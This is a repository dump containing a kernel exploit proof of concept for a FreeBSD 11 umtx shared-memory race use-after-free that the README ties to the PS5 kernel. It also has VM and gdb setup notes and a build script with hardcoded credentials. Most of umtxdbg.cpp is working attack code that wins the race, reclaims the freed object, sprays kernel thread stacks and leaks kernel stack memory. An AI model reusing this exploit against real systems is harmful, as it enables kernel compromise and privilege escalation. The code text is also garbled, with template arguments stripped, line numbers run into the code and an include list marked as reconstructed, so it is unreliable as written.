├── make.sh
├── README.md
└── umtxdbg.cpp

/make.sh:
--------------------------------------------------------------------------------
#!/bin/bash
sshpass -p user scp umtxdbg.cpp user@172.23.28.141:
sshpass -p user ssh user@172.23.28.141 "clang++ -O3 -static -std=c++11 -o umtxdbg umtxdbg.cpp && sync"
--------------------------------------------------------------------------------

/README.md:
--------------------------------------------------------------------------------
# NOTES

The bug was found in early December 2020 — not by me, but by a genius who looked at fbsd for 15 minutes and immediately spotted it 🙇‍♂️. This C++ implementation was made when experimenting with increasing exploit reliability after the PS5 kernel added some heap randomization features.

# setup vm

## get vm image

```
wget http://ftp-archive.freebsd.org/pub/FreeBSD-Archive/old-releases/VM-IMAGES/11.0-RELEASE/amd64/Latest/FreeBSD-11.0-RELEASE-amd64.vhd.xz
```

## enable ssh

in the vm: `adduser`, add `sshd_enable="YES"` to `/etc/rc.conf`, then `/etc/rc.d/sshd start`

## rebuild kernel with debug

build ON THE VM because the FreeBSD build system is incompatible with non-FreeBSD systems (compat was enabled around fbsd 12/13, but we need 11...)

see https://docs.freebsd.org/en/books/handbook/kernelconfig/ or just:

```
cd /usr/src/sys/amd64/conf
cp GENERIC /root/CONFIG
ln -s /root/CONFIG
```

edit CONFIG to __remove__ `options DDB` and __add__ `options GDB`

build and install:
```
cd /usr/src
make buildkernel KERNCONF=CONFIG
make installkernel KERNCONF=CONFIG
reboot
```

copy `/usr/obj/usr/src/sys/CONFIG/kernel.debug` out of the vm for use with gdb.
# setup gdb

## get kernel src for browsing / gdb

```
git clone -b releng/11.0 https://github.com/freebsd/freebsd.git
```

## build gdb with fbsd support

fetch the latest release from https://ftp.gnu.org/gnu/gdb/ and unpack

```
mkdir build
cd build
../configure --disable-binutils --disable-ld --disable-gold --disable-gas --disable-sim --disable-gprof --target=x86_64-unknown-freebsd
make -j64
```

## make gdb suck less

use https://github.com/cyrus-and/gdb-dashboard

### .gdbinit for freebsd kernel

```
set substitute-path /usr/src /home/shawn/freebsd
set disassembly-flavor intel
file kernel.debug
target remote /tmp/fbsd11
```

### wsl interop

https://github.com/weltling/convey
https://github.com/jstarks/npiperelay

### wrapper for starting "loose" gdb

```
#!/bin/sh
GDB_PATH=/home/shawn/gdb-10.1/build/gdb
PATH=$GDB_PATH:$PATH
gdb --data-directory=/home/shawn/gdb-10.1/build/gdb/data-directory
```

### gdb initial breakin

in vm:
```
sysctl debug.kdb.enter=1
```
--------------------------------------------------------------------------------

/umtxdbg.cpp:
--------------------------------------------------------------------------------
#define SMP
// NOTE(review): the original #include targets were stripped during text
// extraction (everything inside <...> was lost). The list below is
// reconstructed from what the code demonstrably uses — verify against the
// original source.
#include <sys/types.h>
#include <sys/param.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <sys/ioctl.h>
#include <sys/umtx.h>
#include <sys/thr.h>
#include <sys/cpuset.h>
#include <sys/rtprio.h>
#include <fcntl.h>
#include <unistd.h>
#include <sched.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>
#include <stdint.h>
#include <errno.h>
#include <atomic>
#include <array>

using u8 = uint8_t;
using u32 = uint32_t;
using vu32 = volatile u32;

// This is just to ensure we act like the real exploit code in case fbsd libc wrappers
// do something unexpected.
29 | #define SYSCALL(name) extern "C" decltype(name) __sys_##name; 30 | SYSCALL(open); 31 | SYSCALL(close); 32 | SYSCALL(_umtx_op); 33 | SYSCALL(shm_open); 34 | SYSCALL(shm_unlink); 35 | SYSCALL(mmap); 36 | SYSCALL(munmap); 37 | SYSCALL(mprotect); 38 | SYSCALL(ftruncate); 39 | SYSCALL(fstat); 40 | SYSCALL(sched_yield); 41 | SYSCALL(thr_new); 42 | SYSCALL(thr_exit); 43 | SYSCALL(cpuset_getaffinity); 44 | SYSCALL(cpuset_setaffinity); 45 | SYSCALL(ioctl); 46 | SYSCALL(rtprio_thread); 47 | #undef SYSCALL 48 | 49 | static int shm_open_anon() { 50 | return __sys_shm_open(SHM_ANON, O_RDWR | O_CREAT, 0666); 51 | } 52 | 53 | static int umtx_shm(void *addr, u_long flags) { 54 | return __sys__umtx_op(0, UMTX_OP_SHM, flags, addr, 0); 55 | } 56 | 57 | static int umtx_shm_create(void *addr) { 58 | return umtx_shm(addr, UMTX_SHM_CREAT); 59 | } 60 | 61 | static int umtx_shm_lookup(void *addr) { 62 | return umtx_shm(addr, UMTX_SHM_LOOKUP); 63 | } 64 | 65 | static int umtx_shm_destroy(void *addr) { 66 | return umtx_shm(addr, UMTX_SHM_DESTROY); 67 | } 68 | 69 | static int cpuset_getaffinity_tid(id_t tid, cpuset_t *mask) { 70 | return __sys_cpuset_getaffinity(CPU_LEVEL_WHICH, CPU_WHICH_TID, tid, 71 | sizeof(*mask), mask); 72 | } 73 | 74 | static int cpuset_setaffinity_tid(id_t tid, const cpuset_t *mask) { 75 | return __sys_cpuset_setaffinity(CPU_LEVEL_WHICH, CPU_WHICH_TID, tid, 76 | sizeof(*mask), mask); 77 | } 78 | 79 | static int cpuset_getaffinity_self(cpuset_t *mask) { 80 | return __sys_cpuset_getaffinity(CPU_LEVEL_WHICH, CPU_WHICH_TID, -1, 81 | sizeof(*mask), mask); 82 | } 83 | 84 | static int cpuset_setaffinity_self(const cpuset_t *mask) { 85 | return __sys_cpuset_setaffinity(CPU_LEVEL_WHICH, CPU_WHICH_TID, -1, 86 | sizeof(*mask), mask); 87 | } 88 | 89 | using rtprio_t = struct rtprio; 90 | 91 | static int rtprio_thread_get(lwpid_t lwpid, rtprio_t *rtp) { 92 | return rtprio_thread(RTP_LOOKUP, lwpid, rtp); 93 | } 94 | 95 | static int rtprio_thread_set(lwpid_t lwpid, const 
rtprio_t *rtp) { 96 | return rtprio_thread(RTP_SET, lwpid, (rtprio_t *)rtp); 97 | } 98 | 99 | // Mainly to ensure the thr_new can be as isolated as possible (e.g. 100 | // allocating the userspace stack doesn't happen to alloc any kernel objects) 101 | // NOTE only "bare" syscalls can be used from these threads. 102 | struct RopThread { 103 | static constexpr size_t STACK_SIZE{0x5000}; 104 | static constexpr size_t TLS_SIZE{0x1000}; 105 | RopThread() { 106 | stack = (u8*)aligned_alloc(0x1000, STACK_SIZE); 107 | tls = (u8*)aligned_alloc(0x1000, TLS_SIZE); 108 | bzero(stack, STACK_SIZE); 109 | bzero(tls, TLS_SIZE); 110 | } 111 | ~RopThread() { 112 | bzero(stack, STACK_SIZE); 113 | bzero(tls, TLS_SIZE); 114 | free(stack); 115 | free(tls); 116 | } 117 | int Start() { 118 | thr_param param = { 119 | .start_func = ThreadThunk, 120 | .arg = this, 121 | .stack_base = (char*)stack, 122 | .stack_size = STACK_SIZE - 0x1000, 123 | .tls_base = (char*)tls, 124 | .tls_size = TLS_SIZE, 125 | .child_tid = &tid, 126 | .parent_tid = &tid, 127 | }; 128 | return __sys_thr_new(¶m, sizeof(param)); 129 | } 130 | static void ThreadThunk(void *arg) { 131 | auto obj = (RopThread*)arg; 132 | obj->ThreadFunc(); 133 | obj->done = true; 134 | while (!obj->do_exit) {} 135 | __sys_thr_exit(nullptr); 136 | } 137 | virtual void ThreadFunc() = 0; 138 | long ThreadId() { 139 | // The creating thread should use parent_tid 140 | return tid; 141 | } 142 | void Join() { 143 | while (!done) {} 144 | do_exit = true; 145 | } 146 | int SetAffinity(size_t cpu_idx) { 147 | cpuset_t mask; 148 | CPU_SETOF(cpu_idx, &mask); 149 | auto rv = cpuset_setaffinity_tid(tid, &mask); 150 | if (rv < 0) { 151 | printf("%s:%d\n", __func__, rv); 152 | } 153 | return rv; 154 | } 155 | int GetAffinity(cpuset_t *mask) { 156 | return cpuset_getaffinity_tid(tid, mask); 157 | } 158 | u8 *stack{}; 159 | u8 *tls{}; 160 | long tid{}; 161 | std::atomic done{}; 162 | std::atomic do_exit{}; 163 | }; 164 | 165 | static void *shm_key; 166 | 
static std::atomic thread_signal; 167 | static std::atomic destroy_count; 168 | static std::atomic destroy_count2; 169 | static std::atomic lookup_count; 170 | static std::atomic lookup_done; 171 | static std::atomic thread_done_count; 172 | static std::atomic race_state; 173 | 174 | static void delay(u32 amount) { 175 | for (vu32 i = 0; i < amount; i++) {} 176 | } 177 | 178 | static void ioctl_spray(u8 val, size_t len) { 179 | u8 buf[len]; 180 | memset(buf, val, len); 181 | for (u32 i = 0; i < 100; i++) { 182 | __sys_ioctl(555555, 0x80000000 | (len << 16), buf); 183 | } 184 | } 185 | 186 | static constexpr bool reclaim_on_main() { 187 | return true; 188 | } 189 | 190 | struct DestroyThread : RopThread { 191 | void ThreadFunc() final { 192 | while (true) { 193 | while (!thread_signal) {} 194 | destroy_count++; 195 | while (!lookup_count) {} 196 | 197 | int rv = umtx_shm_destroy(shm_key); 198 | destroy_count2++; 199 | // TODO care about destroy retval? 200 | while (destroy_count2 < 2 && lookup_done < 1) {} 201 | //delay(1000000); 202 | 203 | if (!reclaim_on_main()) { 204 | fd = shm_open_anon(); 205 | } 206 | 207 | thread_done_count++; 208 | while (!race_state) {} 209 | if (race_state == 0xdead) { 210 | return; 211 | } 212 | race_state--; 213 | } 214 | } 215 | int fd{-1}; 216 | }; 217 | 218 | struct LookupThread : RopThread { 219 | void ThreadFunc() final { 220 | while (true) { 221 | while (!thread_signal) {} 222 | lookup_count++; 223 | while (destroy_count < 2) {} 224 | 225 | //delay(10); 226 | fd = umtx_shm_lookup(shm_key); 227 | lookup_done++; 228 | 229 | thread_done_count++; 230 | while (!race_state) {} 231 | if (race_state == 0xdead) { 232 | return; 233 | } 234 | race_state--; 235 | } 236 | } 237 | int fd{-1}; 238 | }; 239 | 240 | static std::atomic dummy_signal; 241 | static std::atomic dummy_count; 242 | 243 | struct DummyThread : RopThread { 244 | void ThreadFunc() final { 245 | // perform a syscall before notifying that this thread is ready 246 | 
__sys_sched_yield(); 247 | dummy_count++; 248 | while (!dummy_signal) {__sys_sched_yield();} 249 | } 250 | }; 251 | 252 | static void hexdump(const void* buf, size_t len) { 253 | auto data = (u8*)buf; 254 | for (size_t i = 0; i < len; i++) { 255 | bool align = ((i + 1) % 16) == 0; 256 | bool last = i == len - 1; 257 | bool newline = align || last; 258 | printf("%02x%c", data[i], newline ? '\n' : ' '); 259 | } 260 | } 261 | 262 | static int fstat_check(int fd, int original_fd, bool verbose = false) { 263 | struct stat sb{}; 264 | int rv = __sys_fstat(fd, &sb); 265 | auto size = sb.st_size; 266 | int size_fd = size / PAGE_SIZE; 267 | bool suspicious = rv == 0 && size_fd != fd && size_fd != original_fd; 268 | if (verbose) { 269 | printf("fstat %d:%d%s(%d)\n", fd, rv, suspicious ? "!!!" : "", size_fd); 270 | hexdump(&sb, sizeof(sb)); 271 | } 272 | return suspicious ? size_fd : -1; 273 | } 274 | 275 | static void set_shmfd_size(int fd) { 276 | auto size = fd * PAGE_SIZE; 277 | __sys_ftruncate(fd, size); 278 | 279 | // doesn't seem to make a difference 280 | if (0) { 281 | auto addr = __sys_mmap(nullptr, size, PROT_READ | PROT_WRITE, 282 | MAP_SHARED, fd, 0); 283 | memset(addr, 0x41, size); 284 | __sys_munmap(addr, size); 285 | } 286 | } 287 | 288 | struct RaceResult { 289 | u32 num_tries; 290 | int lookup; 291 | int winner; 292 | }; 293 | 294 | static RaceResult race() { 295 | shm_key = malloc(0x100); 296 | bzero(shm_key, 0x100); 297 | 298 | // Note that sony replaced the fbsd scheduler, and in the real exploit 299 | // default thread affinity differs from normal fbsd. 300 | // Normal freebsd defaults threads to all cores at RTP_PRIO_NORMAL priority 0. 301 | // ps5 defaults threads to core 1 at RTP_PRIO_FIFO priority 700. 
302 | cpuset_t cpumask; 303 | CPU_SETOF(0, &cpumask); 304 | cpuset_setaffinity_self(&cpumask); 305 | 306 | std::array dthreads; 307 | for (size_t i = 0; i < dthreads.size(); i++) { 308 | auto& thread = dthreads[i]; 309 | thread.Start(); 310 | thread.SetAffinity(1 + i); 311 | } 312 | 313 | LookupThread lthread; 314 | lthread.Start(); 315 | lthread.SetAffinity(1 + dthreads.size()); 316 | 317 | for (u32 num_tries = 0; ; num_tries++) { 318 | thread_signal = false; 319 | destroy_count = 0; 320 | destroy_count2 = 0; 321 | lookup_count = 0; 322 | lookup_done = 0; 323 | thread_done_count = 0; 324 | race_state = 0; 325 | 326 | for (auto &thread : dthreads) { 327 | thread.fd = -200; 328 | } 329 | lthread.fd = -200; 330 | 331 | int original_fd = -1; 332 | { 333 | // Create a umtx_shm_reg { ushm_refcnt = 1, ushm_obj = { shm_refs = 2 } } 334 | int fd = original_fd = umtx_shm_create(shm_key); 335 | //printf("original fd:%d\n", fd); 336 | set_shmfd_size(fd); 337 | // decref ushm_obj->shm_refs 338 | __sys_close(fd); 339 | } 340 | 341 | thread_signal = true; 342 | while (thread_done_count < 3) {} 343 | thread_signal = false; 344 | 345 | if (reclaim_on_main()) { 346 | // also works. might make logic easier on real exploit. 347 | for (u32 i = 0; i < dthreads.size(); i++) { 348 | // move mainthread to same core as dthread 349 | CPU_SETOF(1 + i, &cpumask); 350 | cpuset_setaffinity_self(&cpumask); 351 | // do the reclaim here instead of on dthread. 
352 | dthreads[i].fd = umtx_shm_create((u8*)shm_key + 8);//shm_open_anon(); 353 | umtx_shm_destroy((u8*)shm_key + 8); 354 | } 355 | CPU_SETOF(0, &cpumask); 356 | cpuset_setaffinity_self(&cpumask); 357 | } 358 | 359 | for (auto &thread : dthreads) { 360 | //printf("destroy:%d\n", thread.fd); 361 | int fd = thread.fd; 362 | if (fd < 0) { 363 | continue; 364 | } 365 | set_shmfd_size(fd); 366 | //fstat_check(fd, original_fd); 367 | } 368 | 369 | int winner = -1; 370 | if (lthread.fd >= 0) { 371 | //printf("lookup:%d\n", lthread.fd); 372 | winner = fstat_check(lthread.fd, original_fd); 373 | } 374 | for (auto &thread : dthreads) { 375 | int fd = thread.fd; 376 | if (fd < 0 || fd == winner) { 377 | continue; 378 | } 379 | //printf("destroy:close:%d\n", fd); 380 | // no impact to exploit but cleans up fd 381 | __sys_close(fd); 382 | } 383 | 384 | if (winner >= 0) { 385 | race_state = 0xdead; 386 | // cleanup threads 387 | for (auto &thread : dthreads) { 388 | thread.Join(); 389 | } 390 | lthread.Join(); 391 | 392 | return { num_tries, lthread.fd, winner }; 393 | } 394 | 395 | race_state = 3; 396 | while (race_state) {} 397 | 398 | // lost: cleanup fd and retry 399 | // NOTE: if the race succeeded but we failed to reclaim the allocation 400 | // (via shm_open_anon on a DestroyThread), then closing this fd will 401 | // cause a doublefree or free of some random kernel allocation - both 402 | // will cause a panic eventually. 403 | // If that becomes a problem, could try multiple shm_open_anon. 
404 | __sys_close(lthread.fd); 405 | } 406 | } 407 | 408 | static bool all_zero(u8 *buf, size_t len) { 409 | for (size_t i = 0; i < len; i++) { 410 | if (buf[i]) { 411 | return false; 412 | } 413 | } 414 | return true; 415 | } 416 | 417 | int main() { 418 | auto result = race(); 419 | 420 | printf("race won after %d tries lookup:%d winner:%d\n", result.num_tries, 421 | result.lookup, result.winner); 422 | std::array spray_threads; 423 | 424 | // need at least 1 but amount doesn't seem to matter much? 425 | u32 fill_count = 1; 426 | auto spray = (u32*)malloc(fill_count * 4); 427 | for (u32 i = 0; i < fill_count; i++) { 428 | umtx_shm_create(&spray[i]); 429 | } 430 | 431 | //fstat_check(result.lookup, 0, true); 432 | //fstat_check(result.winner, 0, true); 433 | 434 | // We have 2 fd referencing a shmfd which will be free'd if we close 1 fd...do that 435 | __sys_close(result.winner); 436 | 437 | // mmap using the remaining fd to reference the free'd but still initialized vmobject. 438 | // It is possible to set nonzero offset if total size is within bounds (set 439 | // by truncating the shmfd). However making the shmfd large and then reading 440 | // off the end of the kstack will segfault. 441 | auto kstack_len = PAGE_SIZE * 4; 442 | auto kstack = (u8*)__sys_mmap(nullptr, kstack_len, PROT_READ | PROT_WRITE, 443 | MAP_SHARED, result.lookup, 0); 444 | 445 | // Spray kernel thread stacks. We want a kstack vmobject to reclaim the 446 | // free'd one which was just mapped. 447 | for (auto &t : spray_threads) { 448 | t.Start(); 449 | } 450 | while (dummy_count != spray_threads.size()) {} 451 | 452 | printf("kstack %p\n", kstack); 453 | if (all_zero(kstack, kstack_len)) { 454 | puts("all zero :("); 455 | // it is safe to exit in this case. we could retry 456 | // it is unclear why this happens 457 | return 1; 458 | } 459 | hexdump(&kstack[kstack_len - PAGE_SIZE], PAGE_SIZE); 460 | 461 | // ctrl+z to send to background for now... 
462 | while (true) { 463 | __sys_sched_yield(); 464 | } 465 | 466 | free(shm_key); 467 | return 0; 468 | } 469 | --------------------------------------------------------------------------------